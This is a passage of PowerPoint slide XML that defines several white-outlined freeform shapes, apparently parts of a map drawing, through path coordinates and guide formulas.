                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="359"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36200" name="Freeform 333"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="621" y="1861"/>
                <a:ext cx="21" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 21"/>
                  <a:gd name="T1" fmla="*/ 39 h 39"/>
                  <a:gd name="T2" fmla="*/ 8 w 21"/>
                  <a:gd name="T3" fmla="*/ 25 h 39"/>
                  <a:gd name="T4" fmla="*/ 3 w 21"/>
                  <a:gd name="T5" fmla="*/ 18 h 39"/>
                  <a:gd name="T6" fmla="*/ 4 w 21"/>
                  <a:gd name="T7" fmla="*/ 12 h 39"/>
                  <a:gd name="T8" fmla="*/ 0 w 21"/>
                  <a:gd name="T9" fmla="*/ 1 h 39"/>
                  <a:gd name="T10" fmla="*/ 0 w 21"/>
                  <a:gd name="T11" fmla="*/ 0 h 39"/>
                  <a:gd name="T12" fmla="*/ 3 w 21"/>
                  <a:gd name="T13" fmla="*/ 1 h 39"/>
                  <a:gd name="T14" fmla="*/ 5 w 21"/>
                  <a:gd name="T15" fmla="*/ 4 h 39"/>
                  <a:gd name="T16" fmla="*/ 14 w 21"/>
                  <a:gd name="T17" fmla="*/ 10 h 39"/>
                  <a:gd name="T18" fmla="*/ 14 w 21"/>
                  <a:gd name="T19" fmla="*/ 12 h 39"/>
                  <a:gd name="T20" fmla="*/ 14 w 21"/>
                  <a:gd name="T21" fmla="*/ 14 h 39"/>
                  <a:gd name="T22" fmla="*/ 13 w 21"/>
                  <a:gd name="T23" fmla="*/ 17 h 39"/>
                  <a:gd name="T24" fmla="*/ 15 w 21"/>
                  <a:gd name="T25" fmla="*/ 23 h 39"/>
                  <a:gd name="T26" fmla="*/ 21 w 21"/>
                  <a:gd name="T27" fmla="*/ 27 h 39"/>
                  <a:gd name="T28" fmla="*/ 21 w 21"/>
                  <a:gd name="T29" fmla="*/ 39 h 3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1"/>
                  <a:gd name="T46" fmla="*/ 0 h 39"/>
                  <a:gd name="T47" fmla="*/ 21 w 21"/>
                  <a:gd name="T48" fmla="*/ 39 h 3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1" h="39">
                    <a:moveTo>
                      <a:pt x="21" y="39"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="39"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36201" name="Freeform 334"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="589" y="1827"/>
                <a:ext cx="12" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 12"/>
                  <a:gd name="T1" fmla="*/ 15 h 28"/>
                  <a:gd name="T2" fmla="*/ 12 w 12"/>
                  <a:gd name="T3" fmla="*/ 18 h 28"/>
                  <a:gd name="T4" fmla="*/ 11 w 12"/>
                  <a:gd name="T5" fmla="*/ 22 h 28"/>
                  <a:gd name="T6" fmla="*/ 9 w 12"/>
                  <a:gd name="T7" fmla="*/ 28 h 28"/>
                  <a:gd name="T8" fmla="*/ 5 w 12"/>
                  <a:gd name="T9" fmla="*/ 18 h 28"/>
                  <a:gd name="T10" fmla="*/ 1 w 12"/>
                  <a:gd name="T11" fmla="*/ 6 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 12"/>
                  <a:gd name="T13" fmla="*/ 3 h 28"/>
                  <a:gd name="T14" fmla="*/ 1 w 12"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 4 w 12"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 8 w 12"/>
                  <a:gd name="T19" fmla="*/ 3 h 28"/>
                  <a:gd name="T20" fmla="*/ 11 w 12"/>
                  <a:gd name="T21" fmla="*/ 15 h 2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2"/>
                  <a:gd name="T34" fmla="*/ 0 h 28"/>
                  <a:gd name="T35" fmla="*/ 12 w 12"/>
                  <a:gd name="T36" fmla="*/ 28 h 2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2" h="28">
                    <a:moveTo>
                      <a:pt x="11" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36202" name="Freeform 335"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="571" y="1804"/>
                <a:ext cx="24" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 24"/>
                  <a:gd name="T1" fmla="*/ 3 h 22"/>
                  <a:gd name="T2" fmla="*/ 24 w 24"/>
                  <a:gd name="T3" fmla="*/ 16 h 22"/>
                  <a:gd name="T4" fmla="*/ 24 w 24"/>
                  <a:gd name="T5" fmla="*/ 18 h 22"/>
                  <a:gd name="T6" fmla="*/ 17 w 24"/>
                  <a:gd name="T7" fmla="*/ 14 h 22"/>
                  <a:gd name="T8" fmla="*/ 13 w 24"/>
                  <a:gd name="T9" fmla="*/ 13 h 22"/>
                  <a:gd name="T10" fmla="*/ 14 w 24"/>
                  <a:gd name="T11" fmla="*/ 19 h 22"/>
                  <a:gd name="T12" fmla="*/ 13 w 24"/>
                  <a:gd name="T13" fmla="*/ 22 h 22"/>
                  <a:gd name="T14" fmla="*/ 6 w 24"/>
                  <a:gd name="T15" fmla="*/ 14 h 22"/>
                  <a:gd name="T16" fmla="*/ 0 w 24"/>
                  <a:gd name="T17" fmla="*/ 9 h 22"/>
                  <a:gd name="T18" fmla="*/ 3 w 24"/>
                  <a:gd name="T19" fmla="*/ 3 h 22"/>
                  <a:gd name="T20" fmla="*/ 5 w 24"/>
                  <a:gd name="T21" fmla="*/ 1 h 22"/>
                  <a:gd name="T22" fmla="*/ 10 w 24"/>
                  <a:gd name="T23" fmla="*/ 0 h 22"/>
                  <a:gd name="T24" fmla="*/ 15 w 24"/>
                  <a:gd name="T25" fmla="*/ 5 h 22"/>
                  <a:gd name="T26" fmla="*/ 21 w 24"/>
                  <a:gd name="T27" fmla="*/ 3 h 2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4"/>
                  <a:gd name="T43" fmla="*/ 0 h 22"/>
                  <a:gd name="T44" fmla="*/ 24 w 24"/>
                  <a:gd name="T45" fmla="*/ 22 h 22"/>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4" h="22">
                    <a:moveTo>
                      <a:pt x="21" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="3"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36203" name="Freeform 336"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9" y="1622"/>
                <a:ext cx="46" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 46"/>
                  <a:gd name="T1" fmla="*/ 24 h 24"/>
                  <a:gd name="T2" fmla="*/ 23 w 46"/>
                  <a:gd name="T3" fmla="*/ 14 h 24"/>
                  <a:gd name="T4" fmla="*/ 17 w 46"/>
                  <a:gd name="T5" fmla="*/ 11 h 24"/>
                  <a:gd name="T6" fmla="*/ 12 w 46"/>
                  <a:gd name="T7" fmla="*/ 10 h 24"/>
                  <a:gd name="T8" fmla="*/ 5 w 46"/>
                  <a:gd name="T9" fmla="*/ 11 h 24"/>
                  <a:gd name="T10" fmla="*/ 3 w 46"/>
                  <a:gd name="T11" fmla="*/ 9 h 24"/>
                  <a:gd name="T12" fmla="*/ 0 w 46"/>
                  <a:gd name="T13" fmla="*/ 6 h 24"/>
                  <a:gd name="T14" fmla="*/ 1 w 46"/>
                  <a:gd name="T15" fmla="*/ 1 h 24"/>
                  <a:gd name="T16" fmla="*/ 5 w 46"/>
                  <a:gd name="T17" fmla="*/ 0 h 24"/>
                  <a:gd name="T18" fmla="*/ 13 w 46"/>
                  <a:gd name="T19" fmla="*/ 4 h 24"/>
                  <a:gd name="T20" fmla="*/ 17 w 46"/>
                  <a:gd name="T21" fmla="*/ 4 h 24"/>
                  <a:gd name="T22" fmla="*/ 21 w 46"/>
                  <a:gd name="T23" fmla="*/ 2 h 24"/>
                  <a:gd name="T24" fmla="*/ 25 w 46"/>
                  <a:gd name="T25" fmla="*/ 2 h 24"/>
                  <a:gd name="T26" fmla="*/ 31 w 46"/>
                  <a:gd name="T27" fmla="*/ 7 h 24"/>
                  <a:gd name="T28" fmla="*/ 43 w 46"/>
                  <a:gd name="T29" fmla="*/ 13 h 24"/>
                  <a:gd name="T30" fmla="*/ 46 w 46"/>
                  <a:gd name="T31" fmla="*/ 17 h 24"/>
                  <a:gd name="T32" fmla="*/ 46 w 46"/>
                  <a:gd name="T33" fmla="*/ 18 h 24"/>
                  <a:gd name="T34" fmla="*/ 42 w 46"/>
                  <a:gd name="T35" fmla="*/ 18 h 24"/>
                  <a:gd name="T36" fmla="*/ 38 w 46"/>
                  <a:gd name="T37" fmla="*/ 18 h 24"/>
                  <a:gd name="T38" fmla="*/ 34 w 46"/>
                  <a:gd name="T39" fmla="*/ 24 h 24"/>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46"/>
                  <a:gd name="T61" fmla="*/ 0 h 24"/>
                  <a:gd name="T62" fmla="*/ 46 w 46"/>
                  <a:gd name="T63" fmla="*/ 24 h 24"/>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46" h="24">
                    <a:moveTo>
                      <a:pt x="34" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36204" name="Freeform 337"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="261" y="2615"/>
                <a:ext cx="20" cy="23"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 20"/>
                  <a:gd name="T1" fmla="*/ 23 h 23"/>
                  <a:gd name="T2" fmla="*/ 2 w 20"/>
                  <a:gd name="T3" fmla="*/ 20 h 23"/>
                  <a:gd name="T4" fmla="*/ 2 w 20"/>
                  <a:gd name="T5" fmla="*/ 14 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 20"/>
                  <a:gd name="T7" fmla="*/ 8 h 23"/>
                  <a:gd name="T8" fmla="*/ 4 w 20"/>
                  <a:gd name="T9" fmla="*/ 5 h 23"/>
                  <a:gd name="T10" fmla="*/ 3 w 20"/>
                  <a:gd name="T11" fmla="*/ 4 h 23"/>
                  <a:gd name="T12" fmla="*/ 2 w 20"/>
                  <a:gd name="T13" fmla="*/ 2 h 23"/>
                  <a:gd name="T14" fmla="*/ 3 w 20"/>
                  <a:gd name="T15" fmla="*/ 1 h 23"/>
                  <a:gd name="T16" fmla="*/ 4 w 20"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 6 w 20"/>
                  <a:gd name="T19" fmla="*/ 2 h 23"/>
                  <a:gd name="T20" fmla="*/ 11 w 20"/>
                  <a:gd name="T21" fmla="*/ 4 h 23"/>
                  <a:gd name="T22" fmla="*/ 15 w 20"/>
                  <a:gd name="T23" fmla="*/ 7 h 23"/>
                  <a:gd name="T24" fmla="*/ 15 w 20"/>
                  <a:gd name="T25" fmla="*/ 9 h 23"/>
                  <a:gd name="T26" fmla="*/ 17 w 20"/>
                  <a:gd name="T27" fmla="*/ 9 h 23"/>
                  <a:gd name="T28" fmla="*/ 18 w 20"/>
                  <a:gd name="T29" fmla="*/ 12 h 23"/>
                  <a:gd name="T30" fmla="*/ 20 w 20"/>
                  <a:gd name="T31" fmla="*/ 13 h 23"/>
                  <a:gd name="T32" fmla="*/ 20 w 20"/>
                  <a:gd name="T33" fmla="*/ 14 h 23"/>
                  <a:gd name="T34" fmla="*/ 18 w 20"/>
                  <a:gd name="T35" fmla="*/ 15 h 23"/>
                  <a:gd name="T36" fmla="*/ 17 w 20"/>
                  <a:gd name="T37" fmla="*/ 17 h 23"/>
                  <a:gd name="T38" fmla="*/ 11 w 20"/>
                  <a:gd name="T39" fmla="*/ 18 h 23"/>
                  <a:gd name="T40" fmla="*/ 8 w 20"/>
                  <a:gd name="T41" fmla="*/ 20 h 23"/>
                  <a:gd name="T42" fmla="*/ 6 w 20"/>
                  <a:gd name="T43" fmla="*/ 23 h 23"/>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20"/>
                  <a:gd name="T67" fmla="*/ 0 h 23"/>
                  <a:gd name="T68" fmla="*/ 20 w 20"/>
                  <a:gd name="T69" fmla="*/ 23 h 23"/>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20" h="23">
                    <a:moveTo>
                      <a:pt x="6" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36205" name="Freeform 338"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="64" y="1934"/>
                <a:ext cx="11" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 11"/>
                  <a:gd name="T1" fmla="*/ 7 h 10"/>
                  <a:gd name="T2" fmla="*/ 9 w 11"/>
                  <a:gd name="T3" fmla="*/ 8 h 10"/>
                  <a:gd name="T4" fmla="*/ 3 w 11"/>
                  <a:gd name="T5" fmla="*/ 10 h 10"/>
                  <a:gd name="T6" fmla="*/ 1 w 11"/>
                  <a:gd name="T7" fmla="*/ 8 h 10"/>
                  <a:gd name="T8" fmla="*/ 0 w 11"/>
                  <a:gd name="T9" fmla="*/ 6 h 10"/>
                  <a:gd name="T10" fmla="*/ 1 w 11"/>
                  <a:gd name="T11" fmla="*/ 5 h 10"/>
                  <a:gd name="T12" fmla="*/ 4 w 11"/>
                  <a:gd name="T13" fmla="*/ 1 h 10"/>
                  <a:gd name="T14" fmla="*/ 6 w 11"/>
                  <a:gd name="T15" fmla="*/ 0 h 10"/>
                  <a:gd name="T16" fmla="*/ 10 w 11"/>
                  <a:gd name="T17" fmla="*/ 3 h 10"/>
                  <a:gd name="T18" fmla="*/ 11 w 11"/>
                  <a:gd name="T19" fmla="*/ 7 h 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
                  <a:gd name="T31" fmla="*/ 0 h 10"/>
                  <a:gd name="T32" fmla="*/ 11 w 11"/>
                  <a:gd name="T33" fmla="*/ 10 h 1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 h="10">
                    <a:moveTo>
                      <a:pt x="11" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
